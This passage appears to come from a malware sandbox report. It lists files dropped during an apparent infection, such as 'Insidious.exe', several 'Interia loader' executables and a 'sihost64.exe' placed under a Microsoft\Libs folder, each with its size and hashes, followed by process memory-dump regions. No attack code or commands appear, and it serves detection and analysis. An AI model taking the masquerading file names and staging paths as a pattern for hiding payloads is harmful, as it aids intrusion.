a9c8787c79a952779eca82e7389cf5bbde7556e4491b8bfcfd6617740ac7d8a2

SHA512
0c19d1e388ed0855a660135dec7a5e6b72ecbb7eb67ff94000f2399bd07df431be538055a61cfb2937319a0ce060898bb9b6996765117b5acda8fc0bad47a349

Download Submit
C:\Users\Admin\AppData\Local\Temp\76ACC2D2-0A1E-46D0-B7BD-4C5A3C1AB24A\OSProvider.dll

Filesize
149KB

MD5
db4c3a07a1d3a45af53a4cf44ed550ad

SHA1
5dea737faadf0422c94f8f50e9588033d53d13b3

SHA256
2165d567aa47264abe2a866bb1bcb01a1455a75a6ea530b1b9a4dda54d08f758

SHA512
5182b80459447f3c1fb63b70ad0370e1da26828a7f73083bec0af875b37888dd12ec5a6d9dc84157fc5b535f473ad7019eb6a53b9a47a2e64e6a8b7fae4cddde

Download Submit
C:\Users\Admin\AppData\Local\Temp\76ACC2D2-0A1E-46D0-B7BD-4C5A3C1AB24A\dismprov.dll

Filesize
255KB

MD5
490be3119ea17fa29329e77b7e416e80

SHA1
c71191c3415c98b7d9c9bbcf1005ce6a813221da

SHA256
ef1e263e1bcc05d9538cb9469dd7dba5093956aa325479c3d2607168cc1c000a

SHA512
6339b030008b7d009d36abf0f9595da9b793264ebdce156d4a330d095a5d7602ba074075ea05fef3dde474fc1d8e778480429de308c121df0bf3075177f26f13

Download Submit
C:\Users\Admin\AppData\Local\Temp\76ACC2D2-0A1E-46D0-B7BD-4C5A3C1AB24A\en-US\AppxProvider.dll.mui

Filesize
22KB

MD5
bd0dd9c5a602cb0ad7eabc16b3c1abfc

SHA1
cede6e6a55d972c22da4bc9e0389759690e6b37f

SHA256
8af0073f8a023f55866e48bf3b902dfa7f41c51b0e8b0fe06f8c496d41f9a7b3

SHA512
86351dc31118fc5a12fad6f549aa60c45ebe92b3ce5b90376e41f60d6d168a8a9f6c35320fc2cdcc750e67a5751651657fe64cf42690943500afd0d1dae2cd0c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Config.exe

Filesize
300KB

MD5
73cdf25255ad49a33ce36e519c8aff4c

SHA1
0d4b7c239499bb8a6d8e9406eef2440d9c352953

SHA256
d399cabe5b2a90a57d59ebf7b3fbff40c5109a26527be5f664c89ffd5902b807

SHA512
0ce62e61b19c2ce05cbee1aa533652635d3b80db31f3bf5b1759c5688ccb55331949d177076a6b65110217ce5135a6c37c2ee5d8ef708e796aaf8288d61ff812

Download Submit
C:\Users\Admin\AppData\Local\Temp\Insidious.exe

Filesize
274KB

MD5
98851f9b3a0194a53f26c8d5da31b4c8

SHA1
8ba83d9220a991c7a190f0c312eb8cee9197e7b0

SHA256
2b2fc85878d79634dd37270508473cf44d14513ac58ce60c5506973f3c95255a

SHA512
9cf9141f25b0852e3e7aacfcbb7fe7458694c6297bc47e1f7203ad710615858743d84e4e757f4cc38fad83e97450e6f18ab0a7824b77104c78d393dca3a4ad01

Download Submit
C:\Users\Admin\AppData\Local\Temp\Interia loader.exe

Filesize
2.2MB

MD5
05c2064ebb4a3843acca2b5546765486

SHA1
28c94d8bf7227ce33ee65d93836b2eab4f410331

SHA256
694278b58b49d1918e6f5d5d4f5dfc1217bf135bfab3e051d05c8aaa4fb7f271

SHA512
27375ffe855615c008f00350816efd5233e17088a5aa04e5e3e30d57644c5d21ed59d4cf9e28d3ea33c491486aa4c7128bc5a1283403d33d32057d4ca4d73c8e

Download Submit
C:\Users\Admin\AppData\Local\Temp\InteriaVis.exe

Filesize
7.4MB

MD5
872d18482ecb36a9ce091c2e669e4eb0

SHA1
e7d55b4fefe1e5dfff8c5f320e5cb686207648c0

SHA256
17f9aad388adefd0a2c09852faa40116d2dbc56321624a7d124fae385ff617ec

SHA512
58c9b76ebd0c25624fefbab215e93410d130a9a43623d327cba750f5ff3332694e929d7ce2279f3cc05536de04788826f8c35252ac09e08eff514015b38a1d21

Download Submit
C:\Users\Admin\AppData\Local\Temp\Interialoader.exe

Filesize
2.3MB

MD5
22bae033c46d71990197f17a981ce3c9

SHA1
ce5488cd3d40e42917c7bb1c642da4b7817248d0

SHA256
620b5b24add3610dadb6d18e4a52f1fa3c6cb5686dac389b655be6ffb1ef62e5

SHA512
3a9448ca3b0b3074eaae4f0803f9d8522d19e5f0bbe222131a64543f374bf8658c8f9c0c08b2136bdc54439bc039e03fa4f61284aae26e15515790487731abd5

Download Submit
C:\Users\Admin\AppData\Local\Temp\InterialoaderNOP.exe

Filesize
9.3MB

MD5
2eb2782cc346b73b7180e3e9a220041c

SHA1
b5d7dbb4f29e2567f9e4d67a9d64d7034ff5a968

SHA256
3220df74888873a8f81e0bde3f4743c25f908bf0c97b768863b67d8d78867425

SHA512
5124335f1362a836dd6f539052f705e64d080fc640abaf489c2407b819de9e79740ca0d5cc8a32310acecdd5e6a6076d83cb4cb7d013fc82b49b060c2b67dec9

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hijgvuvt.rvi.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\44\Process.txt

Filesize
1KB

MD5
2df1939b6c9c987e562613f3a70b3dda

SHA1
c99b7fd7a98bd496a2250f74f9576db09ae1006c

SHA256
1241d7a589351be497cc4270675766350f58ce230c1cf163e86a8c64655757eb

SHA512
61fd1001fb8560d188fdf975d618148dfb6d3c1fab08e03e508da03da3cb2962aba28188b9f86545607124734637cbfa20f4d81e045e46947eaf1702bc983253

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

Filesize
17KB

MD5
f8f848e3792f47b86ac397288fa3f8d7

SHA1
7c4371e46bab5b65d893cacedd03eca1fa33a72b

SHA256
5108a3c3f21488e613fc543c900fcc9874e10677621389573f049bd92fab6061

SHA512
b2371a5109662b975a80839bdc14d1605e310425d56d42058ac5dbc69c7538dc208f175c5025b6646590e4e4826e286ab794cfc01b9d38fbb1db098ca1229c0a

Download Submit
C:\Windows\Logs\DISM\dism.log

Filesize
220KB

MD5
5dd069560265cf13c35d97506d530695

SHA1
a082f08a4d183a132e027447e88e035cee16ade4

SHA256
6e51ae4a0bd2a67d88bbe31afc3f45a62bf146a342133b4ed08bd61d51db1384

SHA512
72f8592bf99165e547dbc380373a66af495170ddacc997538324a0f688b5fe51a95303fd789d07961df391ea45694a07e25e60bdd86423dc5ffd975f33906501

Download Submit
C:\Windows\Logs\DISM\dism.log

Filesize
244KB

MD5
750cf39f88273aaa51537a404da76f2f

SHA1
20c4f9383b07d7c128e10d954886b5baf2a8ccf2

SHA256
ec9659288075f77a97035dde8146ab54586d36e27cf9e1e80f5ed713cc75b2d1

SHA512
79031e4310330de612a406498f39a980240b77fd447c1b25e25e7a7ff4e6caaabb663e3a03c3b520e491f06256b0e098de2751226199eeae1f83b7bfc773178d

Download Submit
memory/264-307-0x00007FFD2DAF0000-0x00007FFD2E5B1000-memory.dmp

Filesize
10.8MB

Download
memory/264-1291-0x000001EAA3890000-0x000001EAA3AAC000-memory.dmp

Filesize
2.1MB

Download
memory/264-320-0x00007FFD2DAF0000-0x00007FFD2E5B1000-memory.dmp

Filesize
10.8MB

Download
memory/264-308-0x0000029313FA0000-0x0000029313FB0000-memory.dmp

Filesize
64KB

Download
memory/768-394-0x0000019EC1000000-0x0000019EC1010000-memory.dmp

Filesize
64KB

Download
memory/768-392-0x00007FFD2DAF0000-0x00007FFD2E5B1000-memory.dmp

Filesize
10.8MB

Download
memory/1664-332-0x000001B62CEC0000-0x000001B62CED0000-memory.dmp

Filesize
64KB

Download
memory/1664-331-0x00007FFD2DAF0000-0x00007FFD2E5B1000-memory.dmp

Filesize
10.8MB

Download
memory/1664-336-0x00007FFD2DAF0000-0x00007FFD2E5B1000-memory.dmp

Filesize
10.8MB

Download
memory/1664-333-0x000001B62CEC0000-0x000001B62CED0000-memory.dmp

Filesize
64KB

Download
memory/1700-249-0x00007FFD2DAF0000-0x00007FFD2E5B1000-memory.dmp

Filesize
10.8MB

Download
memory/1700-133-0x0000023944D90000-0x0000023944DA0000-memory.dmp

Filesize
64KB

Download
memory/1700-145-0x000002395D280000-0x000002395D2A2000-memory.dmp

Filesize
136KB

Download
memory/1700-132-0x00007FFD2DAF0000-0x00007FFD2E5B1000-memory.dmp

Filesize
10.8MB

Download
memory/1700-135-0x0000023944D90000-0x0000023944DA0000-memory.dmp

Filesize
64KB

Download
memory/1748-368-0x000001F78E3E0000-0x000001F78E3F0000-memory.dmp

Filesize
64KB

Download
memory/1748-367-0x00007FFD2DAF0000-0x00007FFD2E5B1000-memory.dmp

Filesize
10.8MB

Download
memory/1748-381-0x00007FFD2DAF0000-0x00007FFD2E5B1000-memory.dmp

Filesize
10.8MB

Download
memory/1748-369-0x000001F78E3E0000-0x000001F78E3F0000-memory.dmp

Filesize
64KB

Download
memory/2160-366-0x00007FFD2DAF0000-0x00007FFD2E5B1000-memory.dmp

Filesize
10.8MB

Download
memory/2160-351-0x00007FFD2DAF0000-0x00007FFD2E5B1000-memory.dmp

Filesize
10.8MB

Download
memory/2160-352-0x0000021FD97E0000-0x0000021FD97F0000-memory.dmp

Filesize
64KB

Download
memory/2160-353-0x0000021FD97E0000-0x0000021FD97F0000-memory.dmp

Filesize
64KB

Download
memory/2420-2-0x000000001C2F0000-0x000000001C300000-memory.dmp

Filesize
64KB

Download
memory/2420-26-0x00007FFD2DAF0000-0x00007FFD2E5B1000-memory.dmp

Filesize
10.8MB

Download
memory/2420-1-0x00007FFD2DAF0000-0x00007FFD2E5B1000-memory.dmp

Filesize
10.8MB

Download
memory/2420-0-0x0000000000A90000-0x0000000001414000-memory.dmp

Filesize
9.5MB

Download
memory/2884-45-0x0000000002BE0000-0x0000000002BF0000-memory.dmp

Filesize
64KB

Download
memory/2884-99-0x00007FFD2DAF0000-0x00007FFD2E5B1000-memory.dmp

Filesize
10.8MB

Download
memory/2884-44-0x00007FFD2DAF0000-0x00007FFD2E5B1000-memory.dmp

Filesize
10.8MB

Download
memory/2884-43-0x0000000000680000-0x00000000008D0000-memory.dmp

Filesize
2.3MB

Download
memory/3160-306-0x00007FFD2DAF0000-0x00007FFD2E5B1000-memory.dmp

Filesize
10.8MB

Download
memory/3160-98-0x00007FFD2DAF0000-0x00007FFD2E5B1000-memory.dmp

Filesize
10.8MB

Download
memory/3160-97-0x0000000000F80000-0x0000000000FCA000-memory.dmp

Filesize
296KB

Download
memory/3160-100-0x000000001BC70000-0x000000001BC80000-memory.dmp

Filesize
64KB

Download
memory/3384-270-0x0000024331C50000-0x0000024331C60000-memory.dmp

Filesize
64KB

Download
memory/3384-297-0x00007FFD2DAF0000-0x00007FFD2E5B1000-memory.dmp

Filesize
10.8MB

Download
memory/3736-89-0x00007FFD2DAF0000-0x00007FFD2E5B1000-memory.dmp

Filesize
10.8MB

Download
memory/3736-250-0x000000001D1A0000-0x000000001D3C0000-memory.dmp

Filesize
2.1MB

Download
memory/3736-92-0x000000001CD90000-0x000000001CDA0000-memory.dmp

Filesize
64KB

Download
memory/3736-330-0x00007FFD2DAF0000-0x00007FFD2E5B1000-memory.dmp

Filesize
10.8MB

Download
memory/3736-75-0x0000000000F90000-0x00000000011BC000-memory.dmp

Filesize
2.2MB

Download
memory/4072-1492-0x00000186B3B40000-0x00000186B3D5C000-memory.dmp

Filesize
2.1MB

Download
memory/4104-1318-0x000001306BA30000-0x000001306BC4C000-memory.dmp

Filesize
2.1MB

Download
memory/4144-1317-0x00000187FE790000-0x00000187FE9AC000-memory.dmp

Filesize
2.1MB

Download
memory/4156-1290-0x0000022E6B0D0000-0x0000022E6B2EC000-memory.dmp

Filesize
2.1MB

Download
memory/4328-1345-0x000001EBAF240000-0x000001EBAF45C000-memory.dmp

Filesize
2.1MB

Download
memory/4452-59-0x0000000000400000-0x000000000041C000-memory.dmp

Filesize
112KB

Download
memory/4648-1342-0x000002053FB60000-0x000002053FD7C000-memory.dmp

Filesize
2.1MB

Download
memory/4772-1977-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/4772-1987-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/4772-1981-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/4772-1980-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/4772-1979-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/4772-2033-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/4772-2034-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/4772-1975-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/4772-1944-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/4772-1947-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/4772-1948-0x00000000005E0000-0x0000000000600000-memory.dmp

Filesize
128KB

Download
memory/4772-1945-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/4772-2035-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/4888-347-0x0000011DD6CC0000-0x0000011DD6CD0000-memory.dmp

Filesize
64KB

Download
memory/4888-350-0x00007FFD2DAF0000-0x00007FFD2E5B1000-memory.dmp

Filesize
10.8MB

Download
memory/4888-338-0x00007FFD2DAF0000-0x00007FFD2E5B1000-memory.dmp

Filesize
10.8MB

Download
memory/5044-24-0x0000000000F30000-0x000000000187C000-memory.dmp

Filesize
9.3MB

Download
memory/5044-58-0x00007FFD2DAF0000-0x00007FFD2E5B1000-memory.dmp

Filesize
10.8MB

Download
memory/5044-27-0x0000000002030000-0x0000000002040000-memory.dmp

Filesize
64KB

Download
memory/5044-25-0x00007FFD2DAF0000-0x00007FFD2E5B1000-memory.dmp

Filesize
10.8MB

Download
memory/5096-304-0x000001AFCFDB0000-0x000001AFCFDC0000-memory.dmp

Filesize
64KB

Download
memory/5096-111-0x000001AFCE1C0000-0x000001AFCE1C1000-memory.dmp

Filesize
4KB

Download
memory/5096-295-0x000001AFCFCF0000-0x000001AFCFD00000-memory.dmp

Filesize
64KB

Download
memory/5096-271-0x000001AFCE1C0000-0x000001AFCE1C1000-memory.dmp

Filesize
4KB

Download
memory/5096-296-0x000001AFCFD50000-0x000001AFCFD60000-memory.dmp

Filesize
64KB

Download
memory/5096-276-0x000001AFCFA70000-0x000001AFD0A70000-memory.dmp

Filesize
16.0MB

Download
memory/5096-302-0x000001AFCFD90000-0x000001AFCFDA0000-memory.dmp

Filesize
64KB

Download
memory/5096-255-0x000001AFCFA70000-0x000001AFD0A70000-memory.dmp

Filesize
16.0MB

Download
memory/5096-305-0x000001AFCFA70000-0x000001AFD0A70000-memory.dmp

Filesize
16.0MB

Download
memory/5096-300-0x000001AFCFDA0000-0x000001AFCFDB0000-memory.dmp

Filesize
64KB

Download
memory/5096-299-0x000001AFCFD70000-0x000001AFCFD80000-memory.dmp

Filesize
64KB

Download
memory/5096-71-0x000001AFCFA70000-0x000001AFD0A70000-memory.dmp

Filesize
16.0MB

Download
memory/5096-242-0x000001AFCFA70000-0x000001AFD0A70000-memory.dmp

Filesize
16.0MB

Download
memory/5096-298-0x000001AFCFA70000-0x000001AFD0A70000-memory.dmp

Filesize
16.0MB

Download
memory/5096-293-0x000001AFCFD10000-0x000001AFCFD20000-memory.dmp

Filesize
64KB

Download
memory/5096-290-0x000001AFCFA70000-0x000001AFD0A70000-memory.dmp

Filesize
16.0MB

Download
memory/5096-282-0x000001AFCFA70000-0x000001AFD0A70000-memory.dmp

Filesize
16.0MB

Download
memory/5096-382-0x000001AFCFA70000-0x000001AFD0A70000-memory.dmp

Filesize
16.0MB

Download